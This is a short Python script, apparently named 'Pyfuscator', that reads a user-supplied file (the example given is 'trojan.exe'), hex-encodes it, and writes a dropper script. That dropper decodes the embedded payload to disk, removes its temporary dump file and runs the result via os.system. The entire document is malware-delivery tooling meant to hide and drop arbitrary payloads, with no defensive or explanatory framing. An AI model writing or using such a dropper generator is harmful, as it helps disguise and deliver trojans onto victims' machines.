import string, os
print("!!! Enter input filename+path. e.g.: /home/user/trojan.exe")
print("-----------------------------------------------------------")
filename = input("Enter input filename: ")
filename1 = input("Enter output filename: ")
filename2 = input("Enter dropper filename: ")
homedir = os.path.expanduser("~")
s = ''.join(['%02x'%c for c in open(filename,'rb').read()])
file = open(homedir+"/"+filename1, 'w')
#file = open(filename1, 'w')
file.write("import binascii, os\n")
file.write("file='"+ filename2 + "'\n") 
file.write('a="' + s + '"\n')
file.write("fi = open('dump.txt','w')\n") 
file.write("fi.write(a)\n")
file.write("fi.close()\n")  
file.write('with open("dump.txt") as fin, open(file, "wb") as fout:\n')
file.write("	for line in fin:\n")
file.write("		vali = binascii.unhexlify(line.rstrip())\n")
file.write("		fout.write(vali)\n")
file.write("os.remove('dump.txt')\n")
file.write("os.system('python3 "+ filename2 + "')")
file.write("#thanks for using Pyfuscator") 
file.close() 
print("File created in: "+homedir)